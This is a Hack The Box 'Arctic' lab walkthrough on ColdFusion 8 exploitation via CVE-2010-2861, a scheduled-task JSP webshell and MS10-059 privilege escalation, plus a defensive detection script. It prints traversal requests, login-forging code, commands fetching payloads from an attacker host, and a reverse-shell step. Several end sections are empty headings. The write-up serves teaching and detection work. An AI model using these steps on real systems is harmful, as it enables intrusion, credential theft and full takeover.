
arctic

Windows · Easy · released 2017-03-22 · retired 2017-12-09

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Arctic runs Adobe ColdFusion 8.0.1 on JRun Web Server, and the foothold is CVE-2010-2861, a directory-traversal / locale-include flaw in the /CFIDE/administrator/enter.cfm page that lets an unauthenticated attacker read arbitrary files relative to the ColdFusion install root. The single high-value file to read is C:\ColdFusion8\lib\password.properties, which contains the admin console’s SHA-1 password hash (no salt). After offline cracking, the attacker logs into /CFIDE/administrator/, abuses the Scheduled Tasks feature to write a JSP webshell to a script-mapped path, and lands a shell as tolis. Privilege escalation is MS10-059 (“Chimichurri”) — a kernel-mode bug in the Windows tracing/serviceability code that lifts a normal user shell to SYSTEM via a public PoC binary.

The teaching beat is “every credentialed-admin web app has a write-a-file primitive somewhere”. ColdFusion’s Scheduled Tasks feature is meant for legitimate cron-like work, but it accepts an arbitrary URL to download from and an arbitrary on-disk path to write the response to — which is a write-a-file primitive that, on a script-mapped server, is also a write-a-shell primitive. Recognising that pattern (in WordPress’s plugin-edit, in Jenkins’s script console, in any “save this output to disk” feature) is more durable than memorising the specific ColdFusion exploit.

Source attribution

Reconstruction is grounded in:

Recon

Three ports — none of them HTTP on tcp/80:

135/tcp   open  msrpc
8500/tcp  open  fmtp     (ColdFusion / JRun)
49154/tcp open  unknown  (RPC ephemeral)

The interesting one is tcp/8500. ColdFusion’s default web port is 8500, and the banner is enough fingerprint to start there. Browsing http://<TARGET>:8500/ returns a default JRun directory listing with /CFIDE/ linked — /CFIDE/administrator/enter.cfm is the admin login.

The login page header reveals the version: ColdFusion 8. CF8 was EOL’d by Adobe in 2014 and ships with two major preauth issues (CVE-2010-2861 LFI and the FCKeditor file-upload bug ZeroDayInitiative ZDI-09-014). Either is a foothold.

The page is slow — JRun on Windows 2008 with ColdFusion’s expression evaluator is famously sluggish. Several public walkthroughs note that even the login page can take 10–20 seconds to render. Don’t conflate that with timeouts.

Foothold — two viable paths

Path A — CVE-2010-2861 LFI + hash crack + Scheduled Tasks

The enter.cfm page on /CFIDE/administrator/ accepts a locale= parameter that is concatenated into a server-side template include. The path is normalized by ColdFusion after the include resolves, so ..\..\..\..\ traversal with a trailing %00 to truncate the appended .cfm reaches arbitrary files relative to the CF install root.

GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1

The response inlines the contents of password.properties into the rendered HTML. The interesting line:

password=<SHA1 of admin console password>

That’s an unsalted SHA-1 hash of the admin console password (plaintext is one of rockyou’s 10k most common — CrackStation returns it in milliseconds). ColdFusion 8 used SHA-1 for the admin password storage; later versions moved to a stronger KDF after this exact bug class kept biting them.

The CF8 login form uses a client-side HMAC-SHA1 wrapper to avoid sending the bare hash, so direct POSTing requires reproducing that step. The form pulls a fresh salt value on each render; the script then sends cfadminPassword = HMAC-SHA1(salt, SHA1(plaintext)).hex().upper():

import re, hmac, hashlib

# r    : the response of a plain GET to /CFIDE/administrator/enter.cfm (fresh salt each render)
# HASH : the uppercase SHA-1 hex string recovered from password.properties
salt = re.search(r'name="salt" type="hidden" value="(\d+)"', r.text).group(1)
mac  = hmac.new(salt.encode(), HASH.encode(), hashlib.sha1).hexdigest().upper()
data = {"cfadminUserId":"admin","cfadminPassword":mac,"salt":salt,
        "requestedURL":"/CFIDE/administrator/enter.cfm?","submit":"Login"}

The ColdFusion admin panel exposes a Scheduled Tasks feature (Server Settings → Scheduled Tasks) that takes a URL to download from and a local path to save the response to. Pointing the URL at an attacker-hosted JSP shell and the local path at C:\ColdFusion8\wwwroot\CFIDE\<name>.jsp writes a script-mapped JSP into the web root.

# attacker
cp /usr/share/webshells/jsp/cmdjsp.jsp ./cmd.jsp
# Edit cmd.jsp to inline a reverse shell, or rely on the cmd
# query parameter and chain it to a PowerShell IEX one-liner.
python3 -m http.server 8080      # same port the task's URL below points at
nc -lvnp 4444
# in the ColdFusion admin panel:
URL:  http://<ATTACKER>:8080/cmd.jsp
File: C:\ColdFusion8\wwwroot\CFIDE\sh.jsp
Save Output: yes

The full param set used in the scripted POST to /CFIDE/administrator/scheduler/scheduleedit.cfm:

TaskName=shell
ScheduleType=Once
Start_Date=5 Μαϊ 2026         # form rendered in the box's locale (Greek)
Start_TimeSpecified=true
StartTimeOnce=12:00
Operation=HTTPRequest
ScheduledURL=http://<ATTACKER>:8080/cmd.jsp
Request_Time_out=60
publish=1                       # NOT publish=true — boolean is "1"/"0"
publish_file=C:\ColdFusion8\wwwroot\CFIDE\sh.jsp
adminsubmit=Submit

Field names diverge from older walkthroughs in two places worth flagging: the time field is StartTimeOnce (not Start_Time), and the “save output” checkbox is publish=1 (not publish=true). The form’s Start_Date field is also locale-formatted — on this rebuild the box is in el-GR (the rendered date is Μαϊ, Greek for “May”), so a parser needs to match that style or accept the server default.

Trigger via GET /CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=shell&timeout=0, then hit http://<TARGET>:8500/CFIDE/sh.jsp?c=whoami — returns arctic\tolis.
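From the defender's side, the whole of Path A leaves four distinct tells in the web tier: the traversal in locale=, a scheduled task whose publish_file ends in a script-mapped extension, the runtask= trigger, and a JSP being served from /CFIDE/. The detector below is an added example, not part of the original writeup; the request records are constructed, the rule names are mine, and it assumes that stock /CFIDE/ content never includes JSP pages and that the POST body is visible (as it is to a reverse proxy or WAF with body logging).

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed (method, url, form_body) records modelled on the Path A sequence;
# not taken from a real Arctic log. 198.51.100.7 is a documentation address.
EVENTS = [
    ("GET",  "/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en", ""),
    ("POST", "/CFIDE/administrator/scheduler/scheduleedit.cfm",
             "TaskName=shell&Operation=HTTPRequest&ScheduledURL=http%3A%2F%2F198.51.100.7%3A8080%2Fcmd.jsp"
             "&publish=1&publish_file=C%3A%5CColdFusion8%5Cwwwroot%5CCFIDE%5Csh.jsp&adminsubmit=Submit"),
    ("GET",  "/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=shell&timeout=0", ""),
    ("GET",  "/CFIDE/sh.jsp?c=whoami", ""),
    ("GET",  "/CFIDE/administrator/enter.cfm?locale=en", ""),                       # benign login page load
    ("POST", "/CFIDE/administrator/scheduler/scheduleedit.cfm",
             "TaskName=report&Operation=HTTPRequest&ScheduledURL=http%3A%2F%2Fintranet%2Freport.cfm&publish=0"),
]

SCRIPT_EXT = (".jsp", ".cfm", ".cfc", ".cfml")   # extensions JRun/ColdFusion will execute

def first(params, key):
    return params.get(key, [""])[0]

def classify(method, url, body):
    """Return the names of the rules a single request trips (empty list if none)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    q = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    hits = []
    # 1. CVE-2010-2861: traversal or null byte in enter.cfm's locale parameter.
    #    parse_qs already decoded once; the second unquote catches double-encoding.
    locale = unquote(first(q, "locale"))
    if path.endswith("/cfide/administrator/enter.cfm") and (
            "../" in locale or "..\\" in locale or "\x00" in locale):
        hits.append("cf_locale_traversal")
    # 2. Scheduled task that saves its HTTP response to a script-mapped file.
    if method == "POST" and path.endswith("/scheduler/scheduleedit.cfm"):
        if first(form, "publish") == "1" and first(form, "publish_file").lower().endswith(SCRIPT_EXT):
            hits.append("cf_task_writes_script")
    # 3. Manual trigger of a task: the detonation step right after the edit.
    if path.endswith("/scheduler/scheduletasks.cfm") and "runtask" in q:
        hits.append("cf_task_run")
    # 4. JSP served from /CFIDE/ (assumption: stock CFIDE ships no JSP pages).
    if path.startswith("/cfide/") and path.endswith(".jsp"):
        hits.append("jsp_under_cfide")
    return hits

def scan(events):
    """(event index, rule name) for every rule tripped, in log order."""
    return [(i, rule) for i, (m, u, b) in enumerate(events) for rule in classify(m, u, b)]

if __name__ == "__main__":
    for index, rule in scan(EVENTS):
        print(f"event {index}: {rule}")
```

Rules 2 and 3 fire on legitimate administrator activity too; their value is that the same source IP trips all four within a minute, which is the sequence to alert on.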

Path B — FCKeditor file upload (CVE-2009-2265)

ColdFusion 8 ships FCKeditor at /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. A POST with a JSP body, a fake application/x-java-archive MIME type, and a null-byte-truncated CurrentFolder=/df.jsp%00 parameter writes the JSP into /userfiles/file/df.jsp. No auth. Browse to that URL to trigger.

Path B is one round-trip; Path A is more involved but more instructive (LFI → hash crack → admin panel → file write). Both land the same context.

arctic\tolis

tolis is a regular domain-joined user; the JRun service runs under that account by deliberate hardening rather than as SYSTEM.

User flag

user.txt is at C:\Users\tolis\Desktop\user.txt. Directly readable from the JSP shell context.

Privilege escalation — MS10-059 (Chimichurri)

systeminfo shows Windows Server 2008 with a small but non-empty hotfix list. Watson / Windows Exploit Suggester narrows the applicable kernel-mode bugs; the reliability winner is MS10-059 (CVE-2010-2554), an arbitrary write in the Windows tracing/serviceability code path that lets a non-admin caller overwrite the per-process Token to grant SYSTEM privileges.

The public PoC is universally referred to as “Chimichurri”:

# attacker — serve the binary
python3 -m http.server 8080
nc -lvnp 4444
# stage on victim via the existing JSP webshell (PowerShell iwr
# stalls past CF's request timeout on this rebuild — certutil is
# faster and the box has no AV/AMSI on the path)
curl -G --data-urlencode 'c=certutil.exe -urlcache -split -f http://<ATTACKER>:8080/Chimichurri.exe C:\Users\tolis\AppData\Local\Temp\c.exe' http://<TARGET>:8500/CFIDE/sh.jsp

# fire as tolis with attacker LHOST/LPORT
curl -G --data-urlencode 'c=C:\Users\tolis\AppData\Local\Temp\c.exe <ATTACKER> 4444' http://<TARGET>:8500/CFIDE/sh.jsp

The exploit launches and the listener catches a SYSTEM cmd:

C:\Windows\system32> whoami
nt authority\system

root.txt lives at C:\Users\Administrator\Desktop\root.txt.

Why each step worked

Counterfactuals

Key Takeaways

References
